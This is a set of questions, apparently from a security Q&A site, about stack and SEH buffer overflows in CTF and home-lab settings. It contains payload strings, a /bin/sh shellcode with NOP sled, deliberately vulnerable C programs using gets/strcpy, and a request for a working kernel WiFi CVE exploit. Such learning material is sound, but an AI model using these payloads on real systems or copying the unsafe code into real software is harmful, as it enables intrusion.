How to tell how big size of a buffer to choose? [migrated]

I’m learning about networking with Python and I’ve encountered something I don’t understand.

particularly:

packet = server.recvfrom(2048)

I understand that .recv() and .recvfrom() methods determine the size of a buffer to work with but sometimes I see 1024, 2048, … and I can’t seem to connect the dots correctly as to how to know what size of a buffer to choose. The learning resources I’m working with aren’t explaining this and I would like to know.

I also understand that a buffer is a temporary data storage allocated within RAM.

Any exploit details regarding CVE-2019-3846 : Linux Kernel ‘marvell/mwifiex/scan.c’ Heap Buffer Overflow Vulnerability

How to get this exploit working or any method for this.

I have seen and read a lot about this issue at various references

It is seen that various Linux version < 8 is vulnerable to this issue

Linux Kernel ‘marvell/mwifiex/scan.c’ Heap Buffer Overflow Vulnerability

Issue Description: A flaw that allowed an attacker to corrupt memory and possibly escalate privileges was found in the mwifiex kernel module while connecting to a malicious wireless network.

Can you share exploit details regarding this.?

https://vulners.com/cve/CVE-2019-3846 https://www.securityfocus.com/bid/69867/exploit : NO exploit there

Any tips on how to exploit this.

What is this “prepare” variable used for in this SEH based buffer overflow payload?

I am trying to understand how a SEH based buffer overflow is working and I have to write a paper about how an exploit works. I took this PoC for my paper.

junk = "\x41" * 4091  nseh = "\x61\x62" seh  = "\x57\x42"           # Overwrite Seh # 0x00420057 : {pivot 8}  prepare =  "\x44\x6e\x53\x6e\x58\x6e\x05" prepare += "\x14\x11\x6e\x2d\x13\x11\x6e\x50\x6d\xc3" prepare += "\x41" * 107; ... 

I don’t really understand how it’s jumping over the next SEH.

  • What is \x61\x62 used for in the nseh variable?
  • What is the prepare variable used for?
  • How is it jumping to the shellcode?

I already understand that the \x57\x42 is used as a pointer to target a pop pop ret to trigger a second error but I am stuck after that…

Understanding why this buffer overflow attack isn’t working

I’m doing a buffer overflow challenge, and I can’t understand what exactly I’m doing wrong. Through debugging, I managed to figure out how my input should look like such that I can force the program to return to a function. From gdb I figured if I entered “aaaaaaaaaaaaaaaaaaaaaaaaaaaacdefbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb” I can get the program to return to cdef of 0x66656463. Here’s a sc just in case: enter image description here As you can see, the program managed to go to 0x66656463. Now I the function’s address through gdb and I tried placing this in cdef’s spot in little endian order using pwntools:

payload = "a" * 28 + "\x56\x85\x04\x08" + "b"*47 msg = "-1\n" + payload  io.sendline(msg) 

The reason for the “-1\n” is because the program asks for input twice: the first time I just enter -1 and then the second input I try the exploit. So far, I’m just getting a segfault and the address I want to jump to should be starting a shell for me to exploit. I’m not sure what exactly I’m doing wrong, and any help would be appreciated. If I had to guess it’s that I’m somehow dealing with the two inputs incorrectly (they’re being read via fgets() in C if that matters.)

EDIT: I have the source binary and I tried running it locally. I created the following txt file

-1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaV\x85\x04\x08bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb 

and I redirect it in gdb via

run < <(cat input.txt) 

this works the same but whenever I add an escaped hex in place of the cdef, I get a different seg fault at a different address: enter image description here

It looks like if I replace any of the cdef with an escaped hex, I get a segfault at 0x08048726. Is something wrong with passing in the bytes?

Buffer Overflow Works Locally But Not Remotely

So I made a simple buffer overflow challenge and attempted to host it on a digitalocean droplet. The challenge source is below, and is compiled using gcc welcome.c -fno-stack-protector -no-pie -o welcome.

#include <unistd.h> #include <stdio.h>  int main(void) {     setvbuf(stdout, NULL, _IONBF, 0);     char name[25];     printf("whats your name? ");     gets(name);     printf("welcome to pwn, %s!\n", name);     return 0; }  void flag() {     char flag[50];     FILE* stream = fopen("flag.txt", "r");     fgets(flag, 50, stream);     printf("%s", flag); } 

Locally on the Docker the challenge is running on, I am able to use the exploit seen here. Trying to use it over the netcat connection though, it doesn’t work! All of the files I am using to host the challenge can be found here. Any help or other tips would be appreciated. I have spent a large part of the day confused about this.

Bonus question, why does the binary hang after completion on the remote server until the user hits enter? Maybe my setvbuf is incorrect? If someone could explain this that would be great! I am fairly new to this stuff.

Cannot execute shellcode using buffer overflow

As a home exercise I’m trying to achieve buffer overflow attack by running a simple char array program that stores the input argument in the program stack and then overflowing that stack with long enough input so that EIP gets overwritten with one of the NOP instructions and then it would slide to the shellcode and execute it.

I’m currently running Ubuntu 16.04 32-bit in Virtualbox, with kernel ASLR set to disabled.

My C code:

#include <stdio.h> #include <string.h>  int main(int argc, char **argv) {   char buffer[500]   strcpy(buffer, argv[1]);   printf("%s\n", buffer);   return 0; } 

I compiled the code with options: -z execstack -fno-stack-protector

When I’m trying to execute the code in gdb using some bash code to generate the input, I manage to change the register value to the one containing the NOPs but the code just throws segmentation fault and I am unable to execute the shellcode.

I started with 504 byte input, 476 NOPs + 24 shellcode + 4x 0x45 bytes.

enter image description here

I was able to find my input in the memory. I took the address somewhere between the NOPs (0xbfffed60).

To overwrite the ESP register, I grew the total input length to 508 bytes, which consisted of: 476 NOPs + 24 shellcode + 2x memory address (0xbfffed60, with bytes in inverted order \x60\xed\xff\xbf).

When I run the code with that input, I’m just receiving segmentation fault and not getting the shellcode to execute.

enter image description here

It seems to go in the exact spot where I’m telling it to go but it does not execute the NOPs nor the shellcode.

Why do we need security measure likes control flow integrity and buffer overflow guard if we have good access control protocol in place?

Reading into information security, I noticed two branches. Access control when communication with external device by using some type of cryptographic authentication and encryption mechanism and things like control flow integrity. My question is why do we need the latter if former is good enough. Are there example of control flow exploits on access control protocol implementation themselves? My focus is mainly on embedded devices.

64bit buffer overflow fails with SIGILL, cannot understand the reason

I have been doing 32bit buffer overflows for some time and I decided to try some 64bit overflows, to explore some more realistic scenarios. I have compiled my code with gcc -fno-stack-protector -z execstack -no-pie overflow.c -o Overflow.

Here is the code:

#include <stdio.h> #include <string.h> void function(char *str) {     char buffer[32];     strcpy(buffer,str);     puts(buffer); }  int main(int argc, char **argv) {     function(argv[1]); } 

Using gdb I determined how many bytes I need to write to control the return address. This is 40 bytes. So at first I tried to write 40bytes of “A” and then 6bytes of “B” to test the control of the return address.

Here is a screenshot: enter image description here

I found and tested a 23 byte shellcode that executes “/bin/sh”, so I try to write a nop-sled of 13 bytes, the shellcode and the first 6 bytes of the return address that need to change. So I come up with this (in gdb):

r $  (python -c'print "\x90"*13+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x10\xe1\xff\xff\xff\x7f"') 

I have set 2 breakpoints before and after the execution of strcpy and examine the memory.

This is the stack before the strcpy: enter image description here

where at address 0x00007fffffffe138 is the return address of function function enter image description here

And this is the stack right after the strcpy execution: enter image description here

So in my understanding, after I press c to continue the execution, I must “return” to the nopsled and then execute the shellcode in gdb.

Instead I get a SIGILL, for illegal instruction.

enter image description here

I cannot figure out why this is happening, any help/suggestions/pointer would be much appreciated.